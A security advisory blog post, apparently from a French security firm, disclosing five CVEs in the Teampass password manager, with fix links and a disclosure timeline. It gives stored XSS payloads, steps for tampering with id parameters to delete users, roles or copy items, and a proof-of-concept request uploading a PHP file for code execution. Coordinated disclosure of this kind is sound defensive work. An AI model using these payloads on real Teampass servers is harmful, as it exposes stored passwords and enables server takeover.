Vous êtes victime d’un incident de sécurité ? Contactez notre CERT

17/11/2017

Blog technique

Teampass < 2.1.27.9 multiple vulnerabilities

Nicolas Zilio

As part of its evaluation centre work, Amossys led a security review of Teampass 2.1.27.8. Multiple security vulnerabilities were found, and here are the CVE publications.

Description

Teampass is a collaborative password manager. It works as a single web application, running basically on an Apache server associated with a MySQL database. On it, users share items, containing passwords as well as associated information like URL or any documentation. Users are distinguished in three categories : simple users, managers and admin. The simple users have only the right to access several items and possibly edit them depending in which category of users they are. Managers can, as their title indicates, manage some categories of simple users, as well as using items. An access control is done on items, meaning that a user of one category can basically only access the items its category can access.

When assessing Teampass security in Amossys Evaluation centre, multiple vulnerabilities were found. In order to help open source projects to get better at security, it was decided to contribute to the project and ask for some CVE numbers in order for corporations to get a follow-up on security of their Teampass product.

CVE-2017-15051: multiple XSS vulnerabilities

Multiple stored cross-site scripting (XSS) vulnerabilities in TeamPass 2.1.27.7 allow authenticated remote attackers to inject arbitrary web script or HTML via the (1) URL value of an item or (2) user log history.

  • Access Vector: remote, authenticated
  • Security Risk: low
  • Vulnerable version: <= 2.1.27.7
  • CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15051

exploitation

For the first one, the attacker has to simply inject XSS code within the URL field of a shared item, for example by setting it to http://teampass<script>alert(1)</script>. From there, any user accessing the item triggers the XSS:

For the second one however, the attacker must prepare a payload within its email, like test&lt;script&gt;alert(2)&lt;/script&gt;@test.com, and then asks an administrator to modify its profile. From there, whenever the administrator or a manager accesses the log of the user, the XSS is triggered:

CVE-2017-15052: No proper access control on users.queries.php

TeamPass version 2.1.27.8 and earlier does not properly enforce manager access control when requesting users.queries.php. It is then possible for a manager user to delete an arbitrary user (including admin), or modify attributes of any arbitrary user except administrator.

  • Access Vector: remote, authenticated, privileged user
  • Security Risk: low
  • Vulnerable version: <= 2.1.27.8
  • Reference: FIX: https://github.com/nilsteampassnet/TeamPass/commit/8f2d51dd6c24f76e4f259d0df22cff9b275f2dd1
  • CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15052

exploitation

To exploit the vulnerability, an authenticated attacker must have the manager rights on the application, then tamper with the requests sent directly, for example by changing the « id » parameter when invoking « delete_user » on users.queries.php. For example, setting the parameter id to « 1 » when deleting a user permits to delete the actual administrator of the application.

CVE-2017-15053: No proper access control on roles.queries.php

TeamPass version 2.1.27.8 and earlier does not properly enforce manager access control when requesting roles.queries.php. It is then possible for a manager user to modify any arbitrary roles within the application, or delete any arbitrary role.

  • Access Vector: remote, authenticated, privileged user
  • Security Risk: low
  • Vulnerable version: <= 2.1.27.8
  • Reference: FIX: https://github.com/nilsteampassnet/TeamPass/commit/ef32e9c28b6ddc33cee8a25255bc8da54434af3e#diff-1b4ddbc831e3ff976e1697a8189de688
  • CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15053

exploitation

To exploit the vulnerability, an authenticated attacker must have the manager rights on the application, then tamper with the requests sent directly, for example by changing the « id » parameter when invoking « delete_role » on roles.queries.php. Here is the associated code to « delete role », where one can see there is no proper check on « id » parameter »:

				
					//-------------------------------------------
#CASE delete a role
case "delete_role":
    DB::delete(prefix_table("roles_title"), "id = %i", $_POST['id']);
    DB::delete(prefix_table("roles_values"), "role_id = %i", $_POST['id']);
    //Actualize the variable
    $_SESSION['nb_roles']--;

    // parse all users to remove this role
    $rows = DB::query(
        "SELECT id, fonction_id FROM ".prefix_table("users")."
        ORDER BY id ASC");
    foreach ($rows as $record) {
        $tab = explode(";", $record['fonction_id']);
        if (($key = array_search($_POST['id'], $tab))&nbsp;!== false) {
            // remove the deleted role id
            unset($tab[$key]);

            // store new list of functions
            DB::update(
                prefix_table("users"),
                array(
                    'fonction_id' => rtrim(implode(";", $tab), ";")
                    ),
                "id = %i",
                $record['id']
            );
        }
    }

    echo '[ { "error"&nbsp;: "no" } ]';
    break;

				
			

CVE-2017-15054: arbitrary file upload

An arbitrary file upload vulnerability, present in TeamPass 2.1.27.8 and earlier, allows remote authenticated users to upload arbitrary files leading to remote command execution.

  • Access Vector: remote, authenticated
  • Security Risk: high
  • Vulnerable version: <= 2.1.27.8
  • Reference: FIX: https://github.com/nilsteampassnet/TeamPass/commit/9811c9d453da4bd1101ff7033250d1fbedf101fc#diff-4adc632318a3f847186449735b362e21
  • CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15054

exploitation

To exploit this vulnerability, an authenticated attacker has to tamper with parameters of a request to upload.files.php, in order to select the correct branch and be able to upload any arbitrary file. From there, it can simply access the file to execute code on the server. Here is a PoC request:

				
					POST /teampass/sources/upload/upload.files.php HTTP/1.1
   Host: localhost
   User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0
   Accept: */*
   Accept-Language: en-US,en;q=0.5
   Referer: http://localhost/teampass/index.php?page=manage_users
   Content-Type: multipart/form-data; boundary=----moxieboundary1510935573083
   Content-Length: 885
   Cookie: ccfc552b8b950dbd8894e23f19a0d167e224ef4f73bd1b100b=43d63a8ebe8d7b140b36ea8e63fe52d17db854281400a8ae50; KEY_PHPSESSID=VCapVaxHIaMVVcKHfzVVZ4Axdx1TmQughDSE%2FNojbtNP8%2BxsKe1BzNVjg5okvVYAHXBLAMdzy9gNgcvtUd5iiA%3D%3D; PHPSESSID=15f1ikkilju907f0043jslcm01; jstree_select=1
   Connection: close

   ------moxieboundary1510935573083
   Content-Disposition: form-data; name="name"

   o_1bv5ce62q5cpnf01uso1o4911b4f.png
   ------moxieboundary1510935573083
   Content-Disposition: form-data; name="chunk"

   0
   ------moxieboundary1510935573083
   Content-Disposition: form-data; name="chunks"

   1
   ------moxieboundary1510935573083
   Content-Disposition: form-data; name="PHPSESSID"

   10000002
   ------moxieboundary1510935573083
   Content-Disposition: form-data; name="File"

   shell.php
   ------moxieboundary1510935573083
   Content-Disposition: form-data; name="type_upload"

   test
   ------moxieboundary1510935573083
   Content-Disposition: form-data; name="user_token"

   shag9ieNgiev3thohgh9ahNgi
   ------moxieboundary1510935573083
   Content-Disposition: form-data; name="file"; filename="shell.php"
   Content-Type: application/x-php

   <?php
   echo "Hacked&nbsp;!";
  &nbsp;?>
   ------moxieboundary1510935573083--
				
			

CVE-2017-15055: No proper access control on items.queries.php

TeamPass version 2.1.27.8 and earlier does not properly enforce item access control when requesting items.queries.php. It is then possible to copy any arbitrary item into a directory controlled by the attacker, edit any item within a read-only directory, delete an arbitrary item, delete the file attachments of an arbitrary item, copy the password of an arbitrary item to the copy/paste buffer, access the history of an arbitrary item, and edit attributes of an arbitrary directory.

  • Access Vector: remote, authenticated
  • Security Risk: medium
  • Vulnerable version: <= 2.1.27.8
  • Reference: FIX: https://github.com/nilsteampassnet/TeamPass/commit/5f16f6bb132138ee04eb1e0debf2bdc7d7b7a15f#diff-39faa1bd4561f6f83a0022dd719124f8
  • CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15055

exploitation

To exploit the vulnerability, an authenticated attacker must tamper with the requests sent directly, for example by changing the « item_id » parameter when invoking « copy_item » on items.queries.php. From there, it can copy any item within one of its accessible directory in order to read the password value. Here is the vulnerable code that does not properly check the user’s right on « id » parameter:

				
					case "copy_item":
    // Check KEY and rights
    if ($_POST['key']&nbsp;!= $_SESSION['key']) {
        $returnValues = '[{"error"&nbsp;: "not_allowed"}, {"error_text"&nbsp;: "1'.addslashes($LANG['error_not_allowed_to']).'"}]';
        echo $returnValues;
        break;
    }

    // perform a check in case of Read-Only user creating an item in his PF
    if ($_SESSION['user_read_only'] === '1' && (!in_array($_POST['source_id'], $_SESSION['personal_folders']) ||&nbsp;!in_array($_POST['des_id'], $_SESSION['personal_folders']))) {
        $returnValues = '[{"error"&nbsp;: "not_allowed"}, {"error_text"&nbsp;: "2'.addslashes($LANG['error_not_allowed_to']).'"}]';
        echo $returnValues;
        break;
    }

    $returnValues = $pw = "";
    $is_perso = 0;

    if (isset($_POST['item_id']) &&&nbsp;!empty($_POST['item_id']) &&&nbsp;!empty($_POST['dest_id'])) {
        // load the original record into an array
        $originalRecord = DB::queryfirstrow(
            "SELECT * FROM ".prefix_table("items")."
            WHERE id=%i",
            $_POST['item_id']
        );
        $dataDestination = DB::queryfirstrow(
            "SELECT personal_folder FROM ".prefix_table("nested_tree")."
            WHERE id=%i",
            $_POST['dest_id']
        );

    [...]
        [copy item]
    [...]

				
			

Conclusion

Amossys asks users of Teampass application to update as soon as they can to the latest version available.

Timeline (dd/mm/yyyy)

  • 10/08/2017: Initial Discovery
  • 29/09/2017: Initial Contact with Nils Laumaillé (creator of Teampass) and acknowledgement of the vulnerabilities
  • 13/10/2017: New version of Teampass including fixes
  • 17/11/2017: Public Disclosure

Voir les derniers articles du Blog technique

9 janvier 2025
Contrairement à une évaluation de sécurité réalisée dans un objectif de certification (CSPN ou Critères Communs), la recherche de vulnérabilités […]
20 décembre 2024
La sécurité informatique peut paraître, pour beaucoup, comme un centre de coût et de complexité : plan d’audits à mettre en […]
16 décembre 2024
Après avoir exploré les vulnérabilités inhérentes aux modèles de langage à grande échelle (LLM) dans notre série d'articles, il est […]
28 novembre 2024
L'exfiltration de modèles LLM (Model Theft in english) par des acteurs malveillants ou des groupes de cyberespionnage avancés est une […]
26 novembre 2024
La surconfiance (Overreliance en anglais) peut survenir lorsqu'un LLM produit des informations erronées et les présente de manière autoritaire [...]
25 novembre 2024
Avec une souche éprouvée, des outils bien choisis et des cibles stratégiques, 8Base se distingue comme une menace particulièrement redoutable. […]
13 novembre 2024
Un système basé sur les LLM (Large Language Models) est souvent doté d'un certain degré d'autonomie par son développeur, [...]
12 novembre 2024
Les plugins pour LLM sont des extensions qui, lorsqu'ils sont activés, sont automatiquement appelés par le modèle pendant les interactions […]
7 novembre 2024
Les LLM ont le potentiel de révéler des informations sensibles (Sensitive Information Disclosure en anglais), des algorithmes propriétaires ou d'autres […]
6 novembre 2024
Le machine learning étend les vulnérabilités aux modèles pré-entraînés et aux données d'entraînement fournis par des tiers, qui sont susceptibles […]